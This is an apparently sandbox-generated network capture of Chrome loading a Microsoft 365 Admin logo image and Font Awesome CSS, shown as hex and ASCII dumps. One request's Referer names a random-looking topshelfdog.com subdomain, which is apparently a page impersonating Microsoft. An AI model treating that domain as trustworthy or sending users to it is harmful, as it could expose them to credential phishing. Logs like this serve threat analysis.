2024-12-17 18:57:04 UTC	7891	IN	Data Raw: 9e fd f2 6c 4f 06 eb 14 d2 6e 56 4c b7 46 f7 db 3d 72 7f 59 a5 80 34 c5 85 a7 b7 08 b4 a0 e4 e1 09 66 82 cf 3b b5 16 90 20 08 6e 0c 84 95 ab 30 dd 73 8d 5d 68 5b 74 1c 7b fc 0f 8d 07 3f ee b6 34 05 b2 33 12 d8 56 e3 e3 19 27 f8 d3 fa 03 06 7b b0 e1 4e f0 8a 95 4e af 91 2c 7f 73 31 7f 89 42 8f fd de 00 8f 7e 0a 6e 5a 1c e4 70 c3 15 1f ad 4a 56 f9 50 b0 0b ad 14 14 fd 04 00 0e d3 45 8f cf fa 59 04 d3 db 90 ae 06 7c 89 dd 98 70 fd de f7 6c 65 5e 99 84 e5 0c 94 1b 84 c1 eb 60 9c 7c ae ee 86 24 3d b2 cd 16 6c ff 78 16 5e 1c 7d dd 44 34 f3 20 33 7e 6b c7 94 0d 80 09 9c 74 17 a7 4b 75 dd 19 b2 95 94 21 13 db 79 34 f4 bd d1 66 d8 d9 7d 7d d7 cb 9e e8 88 73 d3 d7 6a 23 e0 3f 04 c3 b9 07 88 88 a5 05 de b6 e9 5a 33 f9 19 30 7c 5b d8 30 e6 56 87 5d 30 bf c5 46 c5 18 Data Ascii: lOnVLF=rY4f; n0s]h[t{?43V'{NN,s1B~nZpJVPEY\|ple^`\|$=lx^}D4 3~ktKu!y4f}}sj#?Z30\|[0V]0F

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	74.120.190.204	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:05 UTC	428	OUT	GET /logopedia/images/7/7f/Microsoft_365_Admin.png/revision/latest?cb=20241113153458 HTTP/1.1 Host: static.wikia.nocookie.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:06 UTC	1139	IN	HTTP/1.1 200 OK date: Wed, 13 Nov 2024 22:31:30 GMT surrogate-key: 3b19dea483cbdd142eadf86b0915dda773c61260 wiki-logopedia thumblr original content-disposition: inline; filename="Microsoft_365_Admin.png"; filename=UTF-8''Microsoft_365_Admin.png content-type: image/png etag: "bqtH5ho5IHcj+1pry6aFTg==" x-thumbnailer: Thumblr access-control-allow-origin: access-control-allow-headers: Range content-security-policy: default-src 'none'; script-src 'none'; img-src 'self'; media-src 'self'; style-src 'unsafe-inline'; sandbox; report-uri https://services.fandom.com/csp-logger/csp/thumblr cache-control: public, max-age=31536000 nel: {"report_to":"nel","max_age":604800,"failure_fraction":0.01} report-to: {"group":"nel","endpoints":[{"url":"https://services.fandom.com/browser-errors/report"}],"max_age":604800,"include_subdomains":true} content-length: 97739 x-envoy-upstream-service-time: 154 server: envoy x-cacheable: YES age: 2924735 accept-ranges: bytes vary: Accept x-cache: ORIGIN, HIT timing-allow-origin: * x-served-by: thumblr-5f9ff866b6-qnm59, wk-cdn-s12 x-cache-hits: ORIGIN, 399 connection: close
2024-12-17 18:57:06 UTC	13336	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 f4 00 00 01 f4 08 06 00 00 00 cb d6 df 8a 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 20 00 49 44 41 54 78 5e ec bd 09 b8 65 47 59 2e fc d6 9a f6 74 a6 1e d3 99 c8 4c c8 1c 48 87 90 28 c4 40 18 c2 28 04 72 ef 03 28 20 ca 20 a2 a0 e0 05 d1 7b 03 88 38 cb af 08 57 f4 a2 32 09 88 7a 51 64 72 c8 2f 01 c4 90 40 42 12 08 74 27 e9 a4 d3 73 f7 e9 d3 e7 9c 3d ac a9 ea 3e 5f d5 5a 7b 3a 7b ef b5 d6 3e 1d 48 f6 fe 76 9e ce e9 3e bb d6 5a 55 6f d5 aa b7 be 59 80 3f 8c 00 23 c0 08 30 02 8c 00 23 f0 a8 47 40 3c ea 47 c0 03 60 04 18 01 46 80 11 60 04 18 01 30 a1 f3 22 60 04 18 01 46 80 11 60 04 26 00 01 26 f4 09 98 44 1e 02 23 c0 08 30 02 8c 00 23 c0 84 ce 6b 80 11 60 04 18 01 46 80 11 98 00 04 98 d0 27 60 12 79 Data Ascii: PNGIHDRsRGB IDATx^eGY.tLH(@(r( {8W2zQdr/@Bt's=>_Z{:{>Hv>ZUoY?#0#G@<G`F`0"`F`&&D#0#k`F'`y
2024-12-17 18:57:06 UTC	16320	IN	Data Raw: 65 ad 71 4a 1b f5 cc 41 12 7e f6 1c 8f 9a 89 62 07 9a b5 7d 1b bc 05 f6 6b 30 f2 1c 66 b2 b0 5e 73 0f bd f6 e8 0f 91 b7 49 ec a6 50 4a de 2f 8a 32 89 e1 50 ba f6 48 c2 b5 4b 88 a2 08 b6 20 17 55 85 d8 8f 70 a6 1b ef fe a5 2b 4f 7e ea 55 65 b1 33 6b ad f2 f7 d3 81 00 13 fa 74 cc 73 ae 51 de ab d4 fc fb 6e d9 f3 86 83 95 85 df 5c b5 5d 11 40 9a cd 5a 93 37 fd b1 10 eb 44 18 02 b6 b6 9d 8f fe 18 09 2a 2b ac 27 1f a1 0f df 2c b3 37 f4 91 1b ed 98 84 9e 67 f3 1e 86 4e 5e 42 5f cf 33 f2 4a 9b eb ad 56 96 e9 63 d0 05 c2 40 09 3d 67 51 96 e1 58 e6 df c2 06 e3 39 da ff 23 33 ca 21 e9 58 de b9 ea 69 d7 45 e8 56 42 e8 31 28 05 b3 05 65 19 42 b7 a5 44 14 86 f0 dc 9a 8e 88 f0 2c a0 24 14 66 1c 27 2e 1f ba ff ed bf f5 dc 8b ff ec 1c 0e 55 cb da 8a a6 e6 fb fc 6f c3 d4 Data Ascii: eqJA~b}k0f^sIPJ/2PHK Up+O~Ue3ktsQn\]@Z7D*+',7gN^B_3JVc@=gQX9#3!XiEVB1(eBD,$f'.Uo
2024-12-17 18:57:06 UTC	16320	IN	Data Raw: 16 10 78 c0 6d eb 77 e3 27 77 3c 88 3b 77 25 a8 78 2b 51 47 41 5c ef 45 23 82 65 26 88 ad 04 21 35 df 2d b7 91 3a 37 e1 f5 3a c4 d0 f5 39 ba 0f f3 62 e8 79 4d d6 cf f8 4b 05 f0 10 d1 c3 96 24 58 e6 62 74 3f 54 2e ff ee 9b 8e f8 50 de f7 2e 7c 3e 37 5b 60 3e 03 fa 9a 9b 37 c5 13 f2 d0 a7 d3 45 fd 93 e2 7a fb d6 c9 13 78 fa 80 ce ce d7 0c f2 d8 a0 2b 5b d8 6d e2 fe a6 4c 24 27 bc 16 d2 68 c4 08 53 12 9c b8 dc 0d c0 21 3d 3d 89 64 51 b0 4d 03 ae ed 20 0e 7c 04 41 00 db 52 c2 1e 0d 0b 26 1d 6d 9a a8 44 37 3a d9 b8 3c 81 04 bc c8 24 69 47 6d 17 94 da 19 79 ba 96 78 0a 0c 02 be 95 61 16 33 6d 88 a0 22 ee f8 ee c5 39 7a 6b ed fc b3 fb 59 50 05 18 f3 bf 62 22 4e 4c 7a d7 34 14 31 81 14 d7 b4 d0 5b 01 9d d2 af 74 b9 eb 3c 74 0d e8 da e5 3e df 00 9d c0 4c 9e 87 4b Data Ascii: xmw'w<;w%x+QGA\E#e&!5-:7:9byMK$Xbt?T.P.\|>7[`>7Ezx+[mL$'hS!==dQM \|AR&mD7:<$iGmyxa3m"9zkYPb"NLz41[t<t>LK
2024-12-17 18:57:06 UTC	16320	IN	Data Raw: 17 d0 67 c8 42 df d3 80 ae 40 97 2e ec 00 09 85 a5 13 82 3c dd db 05 59 30 cc a0 02 d7 b3 50 0b aa 40 41 a5 ca 14 82 31 1c 50 df 82 cf 9f 75 1a 8e dd 0f 58 4a a0 4d 0b 9c 08 4c 46 01 4c d3 91 ea 69 cc 45 cf 02 fa 04 eb 18 26 fc 04 78 bc 06 9c f9 f5 3b f1 83 5b 1e 43 61 d9 6a 54 82 84 95 3a 60 7b 4a 65 4c 22 df 71 28 d6 88 56 6d 6b 02 ba cb 04 72 14 99 96 1b 32 6c 10 e0 f0 81 3a 7e 78 d1 ab b1 4a c7 ef 53 f7 7c d6 3b de 00 74 71 75 aa 7c 54 01 f4 90 1e 86 34 d9 cd b0 41 6e fe 37 6e d8 81 bf ff ea af 50 1d 38 10 a0 e6 36 12 e1 19 58 a6 56 41 eb 3c cd f6 76 40 6f 47 8a a3 cb b7 5a ae a0 5a 2d 0b 29 8e 20 ae 63 e5 1a a8 75 21 16 71 7a b4 91 7c 6d 2c b2 f3 3c 86 ae eb 0f b2 48 0b 47 3a 01 bb 16 9b 88 dc 21 dc b5 79 14 5f bd e6 76 8c 95 96 23 b4 07 11 db 1e 62 Data Ascii: gB@.<Y0P@A1PuXJMLFLiE&x;[CajT:`{JeL"q(Vmkr2l:~xJS\|;tqu\|T4An7nP86XVA<v@oGZZ-) cu!qz\|m,<HG:!y_v#b
2024-12-17 18:57:06 UTC	16320	IN	Data Raw: a2 7a 6f b3 c7 00 d0 7b 6b b7 4e 8f 6a 4e 75 d3 fd 54 3e 37 4c 54 03 f6 13 03 c3 ae 85 a1 72 1e a5 a1 61 d8 f9 12 22 2b a7 18 e8 7e 15 a5 bc 83 30 98 c6 74 6c a1 e2 0e e3 b7 7f 5c 85 cb 7f 76 23 72 07 1c 26 d6 79 60 27 b5 cd 29 35 c8 b8 b9 e5 26 42 4c a6 d4 40 af 03 3a 07 9a 80 bb ea 78 6a 3e e9 be 07 f4 0b fc fa 78 a5 a7 a0 ac 6b 16 53 36 7c 1f ae b8 c3 4d d1 9d 8f 4d 23 ae 8c 8f 47 a3 e5 52 6c 84 51 1c c7 61 1c 18 71 6c f9 5e bc 0c 66 5c b6 03 af 98 0b 37 1a 86 77 7f 1c 07 9b 4c 23 5e 67 c4 d1 46 13 e1 6a 23 f6 99 13 be dd 5e 1e 8c 7d e7 ec b3 07 ae f1 4e 3b 6c 9f fb 2d 58 40 ef c6 e5 de 7e 00 f5 03 e8 7c 7b 69 50 e7 b9 98 30 45 74 76 05 d8 0d 32 b0 e9 c2 22 59 2e 22 3d c4 c2 f2 78 17 be f4 e6 e7 e0 a9 8f 04 68 84 26 aa ad f5 ae c0 fb d5 ae c6 76 fd 43 Data Ascii: zo{kNjNuT>7LTra"+~0tl\v#r&y`')5&BL@:xj>xkS6\|MM#GRlQaql^f\7wL#^gFj#^}N;l-X@~\|{iP0Etv2"Y."=xh&vC
2024-12-17 18:57:06 UTC	16320	IN	Data Raw: 22 38 92 41 78 ed 9a b4 90 46 76 53 20 9e 8f 29 75 59 f3 b8 48 45 6b d6 27 57 ee 05 c5 fa 96 85 df 7e 01 bd f3 1c 58 6e da 5a ff 80 de be a1 a0 71 47 8b 0a b1 36 1a e0 60 10 9c 3f 0b 6b 1c ef f6 a7 ee 3f fa de 0b 9e 77 dc b7 4e d8 9f 35 1e 8d f7 42 df 73 b0 24 a0 01 7d b0 c6 f3 51 ef cd 11 2f 7d c3 9f 9a 53 07 fe ec ee ad b3 30 32 b9 0a 78 28 68 47 7a 1d d9 05 2c 05 c0 94 32 b5 b7 86 94 07 c4 44 f8 d2 e3 c8 4b 3b a2 32 9c 99 43 3d af f5 ae e2 a4 16 20 56 ae 7b f4 e2 67 ec e6 a8 c1 67 83 e0 d2 3c f9 74 23 d0 04 7e bc a7 48 83 c3 44 c3 d6 86 a4 31 06 2a 92 3b e5 1c 6f 6a d8 c2 4c 8e 40 29 00 1b cd e7 80 11 e9 ca 84 ce 90 0d 4e d4 01 57 7e 71 24 8e 21 73 3c 06 33 4a 73 76 d3 a7 ae b4 f2 66 10 1c 6a fc 8a b7 1f 9b a0 22 d2 95 d9 1d 99 ce a8 1f 14 f1 2e cc e9 Data Ascii: "8AxFvS )uYHEk'W~XnZqG6`?k?wN5Bs$}Q/}S02x(hGz,2DK;2C= V{gg<t#~HD1*;ojL@)NW~q$!s<3Jsvfj".
2024-12-17 18:57:06 UTC	2803	IN	Data Raw: 51 db b3 d3 e4 36 ce 2b e7 bf f3 1b 67 3d 58 73 3f 0d a3 ab cc 46 94 80 17 a3 f5 bd 04 8a 2d 50 b9 55 70 63 96 b2 01 e6 64 41 e0 66 80 19 06 6d ea 02 df a7 cd 80 85 26 7d af 0e 6e a5 44 e5 50 83 fa 3c 94 4c 0e 66 e2 41 19 c2 a8 62 f1 86 63 24 ef 3f 62 22 fc e0 d7 df 7e c6 fc 9e 95 8c 7e ba 96 40 66 6d d3 c2 d0 12 f8 63 95 c0 73 ff cf 7f 9c bf 50 5a 75 e9 c6 99 64 75 dd 18 71 02 e6 1a 41 02 30 32 32 02 b5 f9 19 5a b4 4d b7 4c 9a 35 02 38 7a bd fd 46 1d 4c 66 40 c9 b5 49 eb 2e 21 a5 18 ea f6 29 ab 9c 28 67 89 69 72 68 5e 8f bd 1a 8c 8c 8e 42 9d 3b 10 34 7c 30 dc 12 d8 f1 02 ec eb f8 7c 32 da f6 d9 bf bf e8 94 4b ff 42 a7 a8 fd 51 4c 91 ef ef e0 fb be ee ca eb af 7c c4 1f 7b b9 5f 5e 6b 18 e5 11 48 1a 48 05 20 dc 26 18 c8 c8 90 b7 80 99 22 4b 01 b5 6f 09 e8 Data Ascii: Q6+g=Xs?F-PUpcdAfm&}nDP<LfAbc$?b"~~@fmcsPZuduqA022ZML58zFLf@I.!)(girh^B;4\|0\|2KBQL\|{_^kHH &"Ko

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49745	104.17.25.14	443	3156	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-17 18:57:12 UTC	610	OUT	GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1 Host: cdnjs.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-17 18:57:13 UTC	950	IN	HTTP/1.1 200 OK Date: Tue, 17 Dec 2024 18:57:13 GMT Content-Type: text/css; charset=utf-8 Transfer-Encoding: chunked Connection: close Access-Control-Allow-Origin: * Cache-Control: public, max-age=30672000 ETag: W/"5eb03e5f-7918" Last-Modified: Mon, 04 May 2020 16:10:07 GMT cf-cdnjs-via: cfworker/kv Cross-Origin-Resource-Policy: cross-origin Timing-Allow-Origin: * X-Content-Type-Options: nosniff CF-Cache-Status: HIT Age: 407953 Expires: Sun, 07 Dec 2025 18:57:13 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G3If5Jmpzm078CuR4VbbvBnK%2FeB2RmwC%2B6F%2FyPYT2xmWqf9Ve3a39RBTGd%2Bv8KoUP%2B7%2FlkO0hlmzDMxFVOHbszE3VG8pphzswEMOE9nvfLqk3D1PqtaRAbzcMHzJpxWBTBmJGfCV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Strict-Transport-Security: max-age=15780000 Server: cloudflare CF-RAY: 8f3923392b817c8e-EWR alt-svc: h3=":443"; ma=86400
2024-12-17 18:57:13 UTC	419	IN	Data Raw: 37 39 31 38 0d 0a 2f 2a 21 0a 20 2a 20 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 34 2e 37 2e 30 20 62 79 20 40 64 61 76 65 67 61 6e 64 79 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 20 2d 20 40 66 6f 6e 74 61 77 65 73 6f 6d 65 0a 20 2a 20 20 4c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2e 69 6f 2f 6c 69 63 65 6e 73 65 20 28 46 6f 6e 74 3a 20 53 49 4c 20 4f 46 4c 20 31 2e 31 2c 20 43 53 53 3a 20 4d 49 54 20 4c 69 63 65 6e 73 65 29 0a 20 2a 2f 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 46 6f 6e 74 41 77 65 73 6f 6d 65 27 3b 73 72 63 3a 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 65 6f 74 3f 76 3d 34 2e 37 Data Ascii: 7918/! Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License) */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.7
2024-12-17 18:57:13 UTC	1369	IN	Data Raw: 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 77 6f 66 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 74 74 66 3f 76 3d 34 2e 37 2e 30 27 29 20 66 6f 72 6d 61 74 28 27 74 72 75 65 74 79 70 65 27 29 2c 75 72 6c 28 27 2e 2e 2f 66 6f 6e 74 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 77 65 62 66 6f 6e 74 2e 73 76 67 3f 76 3d 34 2e 37 2e 30 23 66 6f 6e 74 61 77 65 73 6f 6d 65 72 65 67 75 6c 61 72 27 29 20 66 6f 72 6d 61 74 28 27 73 76 67 27 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 7d 2e 66 61 7b 64 69 73 70 6c 61 79 3a Data Ascii: ./fonts/fontawesome-webfont.woff?v=4.7.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.7.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.7.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:
2024-12-17 18:57:13 UTC	1369	IN	Data Raw: 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 70 69 6e 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 33 35 39 64 65 67 Data Ascii: -webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg
2024-12-17 18:57:13 UTC	1369	IN	Data Raw: 63 6b 2d 31 78 2c 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6c 65 66 74 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 66 61 2d 73 74 61 63 6b 2d 31 78 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 2e 66 61 2d 73 74 61 63 6b 2d 32 78 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 65 6d 7d 2e 66 61 2d 69 6e 76 65 72 73 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 66 61 2d 67 6c 61 73 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 30 22 7d 2e 66 61 2d 6d 75 73 69 63 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 31 22 7d 2e 66 61 2d 73 65 61 72 63 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 30 32 22 Data Ascii: ck-1x,.fa-stack-2x{position:absolute;left:0;width:100%;text-align:center}.fa-stack-1x{line-height:inherit}.fa-stack-2x{font-size:2em}.fa-inverse{color:#fff}.fa-glass:before{content:"\f000"}.fa-music:before{content:"\f001"}.fa-search:before{content:"\f002"
2024-12-17 18:57:13 UTC	1369	IN	Data Raw: 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 33 22 7d 2e 66 61 2d 66 6c 61 67 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 34 22 7d 2e 66 61 2d 68 65 61 64 70 68 6f 6e 65 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 35 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 6f 66 66 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 36 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 64 6f 77 6e 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 37 22 7d 2e 66 61 2d 76 6f 6c 75 6d 65 2d 75 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 38 22 7d 2e 66 61 2d 71 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 32 39 22 7d 2e 66 61 2d 62 61 72 63 6f 64 65 3a 62 65 66 6f 72 65 7b Data Ascii: e{content:"\f023"}.fa-flag:before{content:"\f024"}.fa-headphones:before{content:"\f025"}.fa-volume-off:before{content:"\f026"}.fa-volume-down:before{content:"\f027"}.fa-volume-up:before{content:"\f028"}.fa-qrcode:before{content:"\f029"}.fa-barcode:before{
2024-12-17 18:57:13 UTC	1369	IN	Data Raw: 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 38 22 7d 2e 66 61 2d 66 61 73 74 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 39 22 7d 2e 66 61 2d 62 61 63 6b 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 61 22 7d 2e 66 61 2d 70 6c 61 79 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 62 22 7d 2e 66 61 2d 70 61 75 73 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 63 22 7d 2e 66 61 2d 73 74 6f 70 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 64 22 7d 2e 66 61 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 34 65 22 7d 2e 66 61 2d 66 61 73 74 2d 66 6f 72 77 61 72 64 3a 62 65 66 6f 72 65 7b 63 6f 6e Data Ascii: re{content:"\f048"}.fa-fast-backward:before{content:"\f049"}.fa-backward:before{content:"\f04a"}.fa-play:before{content:"\f04b"}.fa-pause:before{content:"\f04c"}.fa-stop:before{content:"\f04d"}.fa-forward:before{content:"\f04e"}.fa-fast-forward:before{con
2024-12-17 18:57:13 UTC	1369	IN	Data Raw: 66 61 2d 65 79 65 2d 73 6c 61 73 68 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 30 22 7d 2e 66 61 2d 77 61 72 6e 69 6e 67 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 65 78 63 6c 61 6d 61 74 69 6f 6e 2d 74 72 69 61 6e 67 6c 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 31 22 7d 2e 66 61 2d 70 6c 61 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 32 22 7d 2e 66 61 2d 63 61 6c 65 6e 64 61 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 33 22 7d 2e 66 61 2d 72 61 6e 64 6f 6d 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 34 22 7d 2e 66 61 2d 63 6f 6d 6d 65 6e 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 37 35 22 7d 2e 66 61 2d 6d 61 67 6e 65 74 3a 62 65 66 Data Ascii: fa-eye-slash:before{content:"\f070"}.fa-warning:before,.fa-exclamation-triangle:before{content:"\f071"}.fa-plane:before{content:"\f072"}.fa-calendar:before{content:"\f073"}.fa-random:before{content:"\f074"}.fa-comment:before{content:"\f075"}.fa-magnet:bef
2024-12-17 18:57:13 UTC	1369	IN	Data Raw: 68 6f 6e 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 35 22 7d 2e 66 61 2d 73 71 75 61 72 65 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 36 22 7d 2e 66 61 2d 62 6f 6f 6b 6d 61 72 6b 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 37 22 7d 2e 66 61 2d 70 68 6f 6e 65 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 38 22 7d 2e 66 61 2d 74 77 69 74 74 65 72 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 39 22 7d 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 2d 66 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 61 63 65 62 6f 6f 6b 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 39 61 22 7d 2e 66 61 2d 67 69 74 68 75 62 3a 62 65 66 6f 72 65 7b 63 6f Data Ascii: hone:before{content:"\f095"}.fa-square-o:before{content:"\f096"}.fa-bookmark-o:before{content:"\f097"}.fa-phone-square:before{content:"\f098"}.fa-twitter:before{content:"\f099"}.fa-facebook-f:before,.fa-facebook:before{content:"\f09a"}.fa-github:before{co
2024-12-17 18:57:13 UTC	1369	IN	Data Raw: 5c 66 30 63 36 22 7d 2e 66 61 2d 73 61 76 65 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 66 6c 6f 70 70 79 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 37 22 7d 2e 66 61 2d 73 71 75 61 72 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 38 22 7d 2e 66 61 2d 6e 61 76 69 63 6f 6e 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 72 65 6f 72 64 65 72 3a 62 65 66 6f 72 65 2c 2e 66 61 2d 62 61 72 73 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 39 22 7d 2e 66 61 2d 6c 69 73 74 2d 75 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 61 22 7d 2e 66 61 2d 6c 69 73 74 2d 6f 6c 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 22 5c 66 30 63 62 22 7d 2e 66 61 2d 73 74 72 69 6b 65 74 68 72 6f 75 67 68 3a 62 65 66 6f Data Ascii: \f0c6"}.fa-save:before,.fa-floppy-o:before{content:"\f0c7"}.fa-square:before{content:"\f0c8"}.fa-navicon:before,.fa-reorder:before,.fa-bars:before{content:"\f0c9"}.fa-list-ul:before{content:"\f0ca"}.fa-list-ol:before{content:"\f0cb"}.fa-strikethrough:befo
